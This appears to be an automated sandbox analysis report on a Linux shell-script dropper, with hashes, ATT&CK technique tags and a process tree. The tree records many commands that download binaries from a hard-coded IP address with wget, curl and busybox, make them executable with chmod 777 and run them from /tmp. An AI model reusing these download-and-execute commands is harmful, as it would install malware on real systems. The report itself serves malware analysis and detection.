Analysis
-
max time kernel
62s -
max time network
63s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:723
-
/bin/rm/bin/rm bins.sh2⤵PID:727
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:750
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:758
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:761
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:762
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:767
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:806
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:821
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:836
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:858
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:869
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:878
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:884
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:890
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:896
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:902
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:910
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:916
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:920
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:926
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:932
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:938
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:944
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:950
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:956
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:962
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:968
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:974
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:980
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:983
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:984
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:986
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:989
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:990
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:992
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:995
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97